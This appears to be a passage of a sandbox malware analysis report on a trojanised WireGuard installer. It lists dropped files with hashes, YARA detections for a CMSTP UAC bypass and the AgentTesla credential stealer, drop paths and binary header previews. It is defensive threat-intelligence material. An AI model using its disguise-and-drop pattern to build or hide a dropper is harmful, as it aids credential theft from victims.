SHA-512:	73588B50A865F0191C057E0896E93168B54436656A2C08CA7F2777593BB528E2AB16C5A37DAFA7489765F2736381A9CCF4BFA43374DA22208C3A87C14165BB03
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Program Files\WireGuard\wireguard.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Program Files\WireGuard\wireguard.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: wireguard-amd64-0.5.3.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........].......".......'..........=........@.......................................}...`... ...............................................c.\|.... d.t.............\|.03... c.....................................................`SY.@............................text.....'.......'................. ..`.rdata..PC1...(..D1...'.............@..@.data... ....PY......0Y.............@....idata..\|.....c.......\.............@....reloc....... c.......\.............@..B.symtab.......d.......]................B.rsrc...t.... d.......].............@..@........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WireGuard.lnk

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Wed Dec 22 14:50:28 2021, mtime=Tue Oct 3 19:35:00 2023, atime=Wed Dec 22 14:50:28 2021, length=8185648, window=hide
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	4.5879347970568745
Encrypted:	false
SSDEEP:	12:8EP120YXui1hMDbdpF4wXg3cb7GFQOjAu2g2C+MpbdpsCobdpsD1NJnN0N9ILYum:8uimbdsMb7jyASj+MVdyBdyTJNm9yfm
MD5:	E24AAAC65AEB887747F9AED610D3A3DB
SHA1:	B9EFAADFA7D4B2176875CE008F0DA69FB5D7D62A
SHA-256:	6CE4AC57AA9D5E5A6ECA105DD0E9E2A0EC86E6D2DCE4FA89D33ACFB5FEB1DA35
SHA-512:	B09D7F4C8817C4CDE321487AAD222BA8B2911D4498D1128B9B3A815615DC2B86AECAB40435B4734CAD82BBA7D61FC9344BEC05D795A02ABC9654ED1118BF9A5B
Malicious:	false
Preview:	L..................F.... .....0.K....{..9.....0.K...0.\|..........................P.O. .:i.....+00.../C:\.....................1.....CWa...PROGRA~1..t......L.CWa.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....\.1.....CWa...WIREGU~1..D......CWa.CWa......X........................W.i.r.e.G.u.a.r.d.....h.2.0.\|..SN~ .WIREGU~1.EXE..L......SN~CWa......X........................w.i.r.e.g.u.a.r.d...e.x.e.......W...............-.......V...........fx.......C:\Program Files\WireGuard\wireguard.exe..*.W.i.r.e.G.u.a.r.d.:. .F.a.s.t.,. .M.o.d.e.r.n.,. .S.e.c.u.r.e. .V.P.N. .T.u.n.n.e.l.4.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.r.e.G.u.a.r.d.\.w.i.r.e.g.u.a.r.d...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.r.e.G.u.a.r.d.\.........&................c^...NI..e.2.......`.......X.......927537...........!a..%.H.VZAj...`..S.[...........!a..%.H.VZAj...`..S.[..................A...1SPS.XF.L8C....&.m.%................S.-.1.-.5.-.1.8

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	812
Entropy (8bit):	7.5469784100055
Encrypted:	false
SSDEEP:	24:5FtKGBz4XjRsTDCpqfJ4qiWeNEAtzeV71i33xx:/tK7RUmpKW1ptyV5+xx
MD5:	5F153429DBD77F4F5F4D376B8898125B
SHA1:	52640ED71F4642EBD6A107ED8AF9C91BD37955CD
SHA-256:	67F1D4859D8D2E611ABFD0CF872B7E668902D2877E8247563C780A26642BE2C9
SHA-512:	E34E6F5B2AD44A37BF16D41DA7E041F5AF0B0FF6FF5D3CD6C1E039E56A7E5B8796083FF968BA1275D13A30A01D683787502D7FA7CA305B30DA730D481F65109F
Malicious:	false
Preview:	0..(......!0.....+.....0......0...0..k0i1.0...U....US1.0...U....Entrust, Inc.1B0@..U...9Entrust Code Signing Root Certification Authority - CSBR1..20221214172400Z0s0q0I0...+........k..E<L.L.j.Q..9@XZ......=...q.7....i5W...%.+.).........;....20221214170000Z....20231214165959Z0....H.............;.VN+}.7.D....j.2...2..\|......y.....=..e.....[,4..r{..:W'...P`....D.$....9..=T...:)"....xr...e.%..8S.<......6~...H.....l..^u.,.)...qP-.dhn..6....z;...$.u.2m..({.c...\|.x.-..v<(.i.5.+....4.%.r&.....\~L!.8..N..^d.^9a.w.....DR......~=..e.\|.l.%.Z..r..%..=.J.T.L=Gi...\..T-j!...\!Z..n.LC)....cr...Qe..n^...G.N.gl).2.<.i..s....X....y.c.@t.hc...(.....%)..b._.').f......U.......q.q.......M.P......a\|.#..K..>Z~.0..s..4.Q.)%.W..l..x.5...../..h..F....C!.0.3..-..Y=....g.'.4.]Nn.'X..&.c...*..2S....~p..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\026A86A161D256DBB33076EDF20C0E5E_86AB612B21DEDF3B8CD155ED2E4114FF

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	812
Entropy (8bit):	7.545694963673205
Encrypted:	false
SSDEEP:	24:5FtKGBz4XjRsYc05A8SKzN5vFXFmF9SEGs:/tK7RBc0n9FXFuMw
MD5:	25C5FACA96F6451A176F9E3776B22324
SHA1:	66339A1E2C9FA166C00BC135A42C9A35B1FED9F2
SHA-256:	5CA35412EB9395B3A5FF2002AEAFF77CF582F76F33647116ED6004F6E79EADDD
SHA-512:	F868A52D12FE853C28AD4B8C8A0208793341A84AA3BDFA7A1BB8C2088801883F6F08C5212C973C0ECF00261FD47CAB72E2D82E25F7B69301510258628A68FC93
Malicious:	false
Preview:	0..(......!0.....+.....0......0...0..k0i1.0...U....US1.0...U....Entrust, Inc.1B0@..U...9Entrust Code Signing Root Certification Authority - CSBR1..20221214172400Z0s0q0I0...+........k..E<L.L.j.Q..9@XZ......=...q.7....i5W...5..{.4.j...F.15+....20221214170000Z....20231214165959Z0....H.............4....6.7lA.;).x99U-..BU..db...G.l...E...F.-.L.7.t.l].'k.78...........z.0.....wm._b.W.$....:G......TZ8P.+Z.R.c.fFzi...&.al.[.<..].ga...gO..y3"..x....c.."Q_!......s...u\|+..uT...YH(.N....T+%..k.Wuo...s...>.\...-..1&.{... ..U..0..7\|.L0l.;.d4Kv....d....GX.-..I*.H.{.&.4h.. .y7....E....'h.tJ .h.1.........s\DYi[W8.4......h.HM...e.)Q...v.....}.'Wd2..y.=}[........ ".~...v.;.......Wb;.P.Og..oTf...U...:...xr.a=......V<...>+('q...S......jH_.>".........s..5(p..w:...Hr.n>.....}gB.:.Tg.H.....=.j

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A37B8BA80004D3266CB4D93B2052DC10_EBDB5A7037F08CDFB408DBFC0D44B43D

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	1592
Entropy (8bit):	7.432965985665518
Encrypted:	false
SSDEEP:	24:S8UqCE3XeRDa824mdgiUQfhSU8hsf52W3IUqCEB7/Iajl6E0YDRW/KrFWvWvXL2:zUG3A+8NiLfYU8hsbYUGx/bP7FoWvXL2
MD5:	C3A139540D2C2C61078B106B4F8A9B36
SHA1:	B01E3444DA82B7260107731332530D984FBD8085
SHA-256:	75541E200B7ECF6003A95A2A940DB0CE2B3FDD35FB905B7A212D644A49511C5F
SHA-512:	A29B4F1AA8D39CE95BBDA5DBD1BFFDD0E1AEAA82DF7A9733C62CAA450D30C59D12531037B86922BA8AF8E8C82B037ABF724887106514DE596E22BF1AA40CBD70
Malicious:	false
Preview:	0..4......-0..)..+.....0......0...0..N0L1.0...U....US1.0...U....Entrust, Inc.1%0#..U....Entrust Validation Authority..20231003101200Z0s0q0I0...+.........\...a......A[B'...jr&z...}.;iQ.l....f...N@.7T......Q......20231003100000Z....20231010095959Z0....H.............&.3dU..Y$..WM.0.........0G.H-I#s...S.en..>p.6.!...qO.a.......:)x.X.+^.$.r.P...pS:...:.g.?.!.,.$..4.i.))..5.$.....B..."^;.B..\|A...5SG6....t....6.X..z..i.f.3...7.....!A.....[...t...xwo.@..f.d_... ...=....._.%...,:l...P4.....oK!.).)1}..."...z...k....%0..!0...0.................jf..S....0....H........0..1.0...U....US1.0...U....Entrust, Inc.1(0&..U....See www.entrust.net/legal-terms1907..U...0(c) 2009 Entrust, Inc. - for authorized use only1200..U...)Entrust Root Certification Authority - G20...230712160414Z..240711160413Z0L1.0...U....US1.0...U....Entrust, Inc.1%0#..U....Entrust Validation Authority0.."0...*.H.............0..............3x.F.'.B..$..-..P@.M....]e..4.B.K..6..p.dk#m'.I.0}X.\|...'...8.h..=.....;....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9B13BCD41ACB49316A37129BE941FFA_BD22E51CB23A085126973E3A7E539978

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	785
Entropy (8bit):	7.493818289556605
Encrypted:	false
SSDEEP:	24:C2UHseusiJDfNW/7V1m33snxl5ZTSib8RxCeMDh:C2UCGR1k3snxX9XZh
MD5:	7DC3DA30FAC3E311EFF926740BEBB5DB
SHA1:	255A856F941ECEEA34D84FEB496CAD206D425897
SHA-256:	148F224813109487BDB210936A776A39ACC403124071B0FF361BCF15A3D0D2DA
SHA-512:	3313E9FE4C956FEFD2987052DCB24C11EA233FBA30184053929AE73922BCFD08B762B5A6F7E2793568865236812748FE2FA3F1E61E0AD6FC5555AB4B9188CCD4
Malicious:	false
Preview:	0..........0.....+.....0......0...0..P0N1.0...U....US1.0...U....Entrust, Inc.1'0%..U....Entrust Time Stamping CA - TS2..20231003192700Z0s0q0I0...+..........(...@&A.Mtr...td ..&...H.....TT.........t...Q<"g.G.6.?{.....20231003190000Z....20231010185959Z0....H...............nwi.........mWS!.y..&1g.HZ......$.;..~........eSBn#....R`-h.......j{.O...r.z(...:...H..u.1.-...-..g3.0.....3F.1L.......%..x.),P.......\E....q#4...~jZ2.....o..%g.......a~.........2.lO.D....i....`d..&..~v.9....E..e.?......._....'Oq.ybF......S...x......{G>......7...M..........w.9.Z7.G.pn~n..L...w..$.P./@&..O[.8.w..{......j.;.`.6~.^.#..ds%. ...2%W..8.`07o.Qx....I?...9.^........0..-.o.!..a....;.q...........`.y.e.34..m%5p.Z`\|.9...i..&{.. (nsT....q...PJ.\X}d..8"..3o@)....{..\5.....V.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AF360AACB1570042DEFBC833317997D0_6D40F27EBCB4D57A7D8447DAAC4FFE30

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	7.522647110559099
Encrypted:	false
SSDEEP:	24:UpwUZImCieVtmv8Z3FVEF0gKjbt8kwBGO6:7UZTCieB3FVEF0gKjbils
MD5:	5F8EF5BE1BDCC35AB5F3C3C65AA8CCC5
SHA1:	94017DDC70B188B1C11AAE087B5078B80CE6A3D3
SHA-256:	9F1218C50BDB829232EC4F5DEEA027072514CD3B833E60F527377DCA1F25325C
SHA-512:	DAF243ED3EC9F6D3251F69A3DFC792901A1970D8575425C35145B0F52DC854C6081BE2DFA26798EA8098EAEE2965D04F5FA09B21262F54CAD8A33162641B11DD
Malicious:	false
Preview:	0..".......0.....+.....0......0...0..e0c1.0...U....US1.0...U....Entrust, Inc.1<0:..U...3Entrust Extended Validation Code Signing CA - EVCS2..20231003124000Z0s0q0I0...+........i.d.)...r ..'d{.......O.Q....b.1#a.a...x..{......H..o......20231003120000Z....20231010115959Z0....H..............^Y...Z%.K...-[..M%.dQ#.k...o.^q.z..j2m.D.^2..yI.G.^.I]S...,?.C..)..X.3^u3y..E,.z..~fG..g.V.o}.!.o....{]AL.......f..b.R..8#.O.CT(.2^b...^T.E......g......;..Q..:..M.....d.!0...O...).d....o_...f...Z..4\|...4uB..l.6H..L.+.EG.[.....P....cmu.a..j..+5.r...n.Ub....(b.....h._...@.T.6............(v..6[.e.....c.O..01..O..w.~..(1....]'....<.i..M.@....,......$.....m..d..%..m.3..'@..6....&DQ.QW/\|dn.+...`\|9..*...Z..{.:..:.1../.........r....N....Vy....xue..].....J.......zc^.G[...e...4&6....~"

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	540
Entropy (8bit):	3.958322638931325
Encrypted:	false
SSDEEP:	12:3QJXHXiv8sFz06VKMaG7uUCFl4sR58vuB6:3KHYvZvd4fbR58m4
MD5:	FD052D20F73853F977F323699524DB8C
SHA1:	13BA160DC57E790407C018EE6CFC580DBF9C6ACE
SHA-256:	53FDAD0FC523DA86FF1EA1ED309B686EB20233FD7C426A446FB95FE1DB99DDCD
SHA-512:	F9C76124C72539D33DB5642FBB534DCE0DA7EFED1AA6CDE49EF9C0CAEB66C95D44EB9121C32B069AA46A2BB1ADDDB19DC8046CAA51046C0E5C4149A20E616E24
Malicious:	false
Preview:	p...... ...."....h..9...(................h^..................................... ........h^.....&...............,...h.t.t.p.:././.o.c.s.p...e.n.t.r.u.s.t...n.e.t./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.R.r.2.b.w.A.R.T.x.M.t.E.y.9.a.s.p.R.A.Z.g.5.Q.F.h.a.g.Q.Q.U.g.r.r.W.P.Z.f.O.n.8.9.x.6.J.I.3.r.%.2.F.2.z.t.W.k.1.V.8.8.C.E.C.W.8.K.%.2.F.M.p.y.h.B.%.2.F.H.q.m.6.i.I.X.U.n.T.s.%.3.D...".6.7.F.1.D.4.8.5.9.D.8.D.2.E.6.1.1.A.B.F.D.0.C.F.8.7.2.B.7.E.6.6.8.9.0.2.D.2.8.7.7.E.8.2.4.7.5.6.3.C.7.8.0.A.2.6.6.4.2.B.E.2.C.9."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\026A86A161D256DBB33076EDF20C0E5E_86AB612B21DEDF3B8CD155ED2E4114FF

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	540
Entropy (8bit):	3.954196432594175
Encrypted:	false
SSDEEP:	12:WQJGDHXiv8sFz06VKMaG7uUyHuYlFDo0ZF494O0sL:W/HYvZvdEZ/NI
MD5:	76F632E0DB0875E9B07C4F8366CFA06C
SHA1:	0EC23382470D24AF6F96EC6F17B8698A62FE2AB7
SHA-256:	0531808831AC6B2D88EB0D5AD4E7B70603DA046489A390F8A253F365BCC0D09E
SHA-512:	76E5C27172A2C70B367BCC369BC0AE17CB1F1B0340A4C26F2D0C2A58B9249FA9EC6FEA0832825759D188C18906168A8EAEAD1ABD6EFE387FA19DB3B13A22D24C
Malicious:	false
Preview:	p...... ...."....W..9...(................h^..................................... ........h^.....{...............,...h.t.t.p.:././.o.c.s.p...e.n.t.r.u.s.t...n.e.t./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.R.r.2.b.w.A.R.T.x.M.t.E.y.9.a.s.p.R.A.Z.g.5.Q.F.h.a.g.Q.Q.U.g.r.r.W.P.Z.f.O.n.8.9.x.6.J.I.3.r.%.2.F.2.z.t.W.k.1.V.8.8.C.E.D.W.v.t.3.u.d.N.B.9.q.%.2.F.I.%.2.B.E.R.q.s.x.N.S.s.%.3.D...".5.C.A.3.5.4.1.2.E.B.9.3.9.5.B.3.A.5.F.F.2.0.0.2.A.E.A.F.F.7.7.C.F.5.8.2.F.7.6.F.3.3.6.4.7.1.1.6.E.D.6.0.0.4.F.6.E.7.9.E.A.D.D.D."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A37B8BA80004D3266CB4D93B2052DC10_EBDB5A7037F08CDFB408DBFC0D44B43D

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	528
Entropy (8bit):	3.942476332757443
Encrypted:	false
SSDEEP:	12:MiOHXiv8sFLTr38VQlkNbfH513vC2XBu++ZUegF8m6/:MiOHYvNrgbBHP+HgdK
MD5:	F959BBFECA3D8E14A23894CAECDB7A54
SHA1:	9C054BEA36D25563CFAA7D0480221B674AA1412C
SHA-256:	5555B76F143AFFE01B9FC823EADFBCE756EB14CD99DEE60E0A3C5B69ACEC3A77
SHA-512:	1C34251B54580E5A17F24186A204FEE64D21ADC791460FB192ED7E400A3BC9F1B03E734F1066E82F232F1633ACCB0F9DF5A6229B9F4BB784FAADADE2C771456E
Malicious:	false
Preview:	p...... ........D..9...(................P._......S.`.....................S.`... ........P._....................8...h.t.t.p.:././.o.c.s.p...e.n.t.r.u.s.t...n.e.t./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.L.X.N.C.z.D.v.B.h.H.e.c.W.j.g.7.0.i.J.h.B.W.0.I.n.y.w.Q.U.a.n.I.m.e.t.A.e.7.3.3.n.O.2.l.R.1.G.y.N.n.5.A.S.Z.q.s.C.E.E.5.A.5.D.d.U.7.e.a.M.A.A.A.A.A.F.H.T.l.H.8.%.3.D...".7.5.5.4.1.E.2.0.0.B.7.E.C.F.6.0.0.3.A.9.5.A.2.A.9.4.0.D.B.0.C.E.2.B.3.F.D.D.3.5.F.B.9.0.5.B.7.A.2.1.2.D.6.4.4.A.4.9.5.1.1.C.5.F."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9B13BCD41ACB49316A37129BE941FFA_BD22E51CB23A085126973E3A7E539978

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	544
Entropy (8bit):	3.989843047016082
Encrypted:	false
SSDEEP:	12:TIeskfl7HXiv8sFFdrK9zOeOlW5uelc0l4vWsPPYS0jWDur:86N7HYvPdrKR4j6cc4RIzHr
MD5:	AC0687F5110BCADC99228D2AC82B751A
SHA1:	DB7165DE6DE8459A5B1510008427D6A8E3F6F584
SHA-256:	BF06628800C1F3FFE51E50DB44550507264FF16C5885287E506E9817F8151BBE
SHA-512:	4BB68AC1C41EC189F6A28373053AF5E16489D9F8AE1271DA6A422844B24BB3CBAE9105D19010B4343F28B74B4A0420F19FF8EF888503C57FFE4638549634E187
Malicious:	false
Preview:	p...... ....&.......9...(...................+.....;.......................;..... ...........+.......................h.t.t.p.:././.o.c.s.p...e.n.t.r.u.s.t...n.e.t./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.X.o.C.i.b.p.o.l.A.J.k.H.k.r.E.1.0.c.o.C.b.1.H.R.k.I.A.Q.U.J.g.%.2.F.w.x.E.g.I.G.8.3.d.k.f.V.U.V.L.a.z.s.%.2.F.y.Z.8.Q.g.C.E.H.T.Z.8.t.t.R.P.C.J.n.%.2.F.U.e.c.N.g.c.%.2.F.e.x.0.%.3.D...".1.4.8.F.2.2.4.8.1.3.1.0.9.4.8.7.B.D.B.2.1.0.9.3.6.A.7.7.6.A.3.9.A.C.C.4.0.3.1.2.4.0.7.1.B.0.F.F.3.6.1.B.C.F.1.5.A.3.D.0.D.2.D.A."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AF360AACB1570042DEFBC833317997D0_6D40F27EBCB4D57A7D8447DAAC4FFE30

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	data
Category:	dropped
Size (bytes):	540
Entropy (8bit):	3.9797844062615084
Encrypted:	false
SSDEEP:	12:SkFX9HXiv8sFkOmTP4ws/FTGoHFnNM9qAfx:SkbHYvuOmT2dNM46
MD5:	C2C65F4EACFFEB2FB10CBE168BD34D0F
SHA1:	AC3379007B899345B55973A0E373C6125D8BD34A
SHA-256:	0CD3FA18CE83EC21E198E113F1AF790D01F50B7D0E0E90EDAD8B615E8D0F2965
SHA-512:	0561B266D7A950EEB10E54922E3B26AB2430FC72A2C197D6D00D711B13C8FE6A8C3CA92597AE0E25596BAD8D267A0B045B98A61CC3BE69B60DF39FBB5643DAC7
Malicious:	false
Preview:	p...... ...."..../..9...(................ .".......Jq......................Jq... ........ ."....................&...h.t.t.p.:././.o.c.s.p...e.n.t.r.u.s.t...n.e.t./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.R.p.%.2.B.m.Q.D.K.a.u.E.4.n.I.g.%.2.F.g.k.n.Z.H.u.B.l.L.k.f.K.g.Q.U.z.o.l.P.g.l.G.q.F.a.K.E.Y.s.o.x.I.2.H.S.Y.f.v.4.%.2.F.n.g.C.E.H.v.W.x.P.r.G.6.a.7.y.S.O.S.a.s.w.t.v.v.I.E.%.3.D...".9.F.1.2.1.8.C.5.0.B.D.B.8.2.9.2.3.2.E.C.4.F.5.D.E.E.A.0.2.7.0.7.2.5.1.4.C.D.3.B.8.3.3.E.6.0.F.5.2.7.3.7.7.D.C.A.1.F.2.5.3.2.5.C."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wireguard-pro.exe.log

Download File

Process:	C:\Users\user\Desktop\wireguard-pro.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	859
Entropy (8bit):	5.380203029918616
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPKI51KDLI4MN5OWDh1BakvoDLI4MWuPakLk7OKbbDLI4MWuPOKq:ML9E4KSM1qE4GOA0E4KRKDE4KGKMKhk
MD5:	8FE8DBE3C5D023195085777AA1DD9353
SHA1:	3612D0870F3BBDAF68C45C0DBBCC034ECE5E4B02
SHA-256:	5223964B0470E405CF1E33254A32812D768754BA8DFB4B9B163A6F4534C0B70A
SHA-512:	5F499656C02CB4C264DCB8A36E3B96AEA5ACC38F4E561ACBD8EE59800291DB729A3AF5FED20E9EB121E3BDB4F4DBB27EA3138B6DD1033BD157D142D8A5655942
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\37a1d51f35918dd36a0d4e34cc91732e\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\7e5e0d92b127a5150606d81839f29044\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\028f9e8b0c8b1820df7bec952b01fe12\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\89bc329e8c65a9e13067c9776d925d78\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Download File

Process:	C:\Users\user\Desktop\wireguard-pro.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	87360
Entropy (8bit):	6.676861354946029
Encrypted:	false
SSDEEP:	1536:+UD86+VKgtoNMJiYkiW2yF4q/4i98+ayxpF0Kxn+7ygK/fM:RwlJnsiJyrQi98+ay+KqK/k
MD5:	1CF9257C07936D7FBF508DC113E9B6D5
SHA1:	324F8A1F0779FE42BAABC544BC7F6814A3D150CA
SHA-256:	EEEE2B0A6AD1C7E4614FED4DFBE58B63776F6A3A6758267B5A976B4DC4315F48
SHA-512:	081FA75E73138FB403AA01CB09F3051B7EE6954AB0A15366016CABE873D7A64F8374C85D9BCDF068FA019930419C818D102063983A5547AE5107773FE25E5C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......a..........................................@..................................6....@.................................(...P....0...c..........."..@3......,...........................\.......................\|.......4...`....................text............................... ..`.rdata..Z...........................@..@.data...(E..........................@....tls......... ......................@....rsrc....c...0...d..................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpG47.tmp (copy)

Download File

Process:	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	187392
Entropy (8bit):	5.529352384774886
Encrypted:	false
SSDEEP:	3072:1ZGaTHmQUtUHQkH+wWtaiQGlIQZboLRF9ua/aHyvZRGd2ite:1ZjqQU4j7xGlVbA
MD5:	64A509A5D856C0E1BC482E64E5EA8556
SHA1:	AC04F5364CE8DF715BC99F9D7BAE5725C18DDE59
SHA-256:	D366F0980A9C490F3A9A2C6A7680D011899F345FD2D0BDC5C1642B436BBAB262
SHA-512:	D424681E9398409DB1846303E06B873DE9BED8644C627DF798BB90094AACE358432B2E302E0A0A20B703A231023BA0F9A6AC603DD34D82417070E363C6AB917A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pa.e................................. ........@.. .......................@............@.................................H...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d................k...y...........................................0...........r...p.rk..p.r...p... ......r...p..(......o......(.....o.......(...........s...........[o......s.........o...........o........s...........s.........i...............io........o.......o.....(.........o..........+......2%(......(........v.(.......2%(......(..........v.(.......2%(......(...........s.........s.........s.........s............2%(......(.........0..!.......~....o....*...2%(...

C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Download File

Process:	C:\Users\user\Desktop\wireguard-pro.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	187392
Entropy (8bit):	5.529352384774886
Encrypted:	false
SSDEEP:	3072:1ZGaTHmQUtUHQkH+wWtaiQGlIQZboLRF9ua/aHyvZRGd2ite:1ZjqQU4j7xGlVbA
MD5:	64A509A5D856C0E1BC482E64E5EA8556
SHA1:	AC04F5364CE8DF715BC99F9D7BAE5725C18DDE59
SHA-256:	D366F0980A9C490F3A9A2C6A7680D011899F345FD2D0BDC5C1642B436BBAB262
SHA-512:	D424681E9398409DB1846303E06B873DE9BED8644C627DF798BB90094AACE358432B2E302E0A0A20B703A231023BA0F9A6AC603DD34D82417070E363C6AB917A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pa.e................................. ........@.. .......................@............@.................................H...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d................k...y...........................................0...........r...p.rk..p.r...p... ......r...p..(......o......(.....o.......(...........s...........[o......s.........o...........o........s...........s.........i...............io........o.......o.....(.........o..........+......2%(......(........v.(.......2%(......(..........v.(.......2%(......(...........s.........s.........s.........s............2%(......(.........0..!.......~....o....*...2%(...

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

Download File

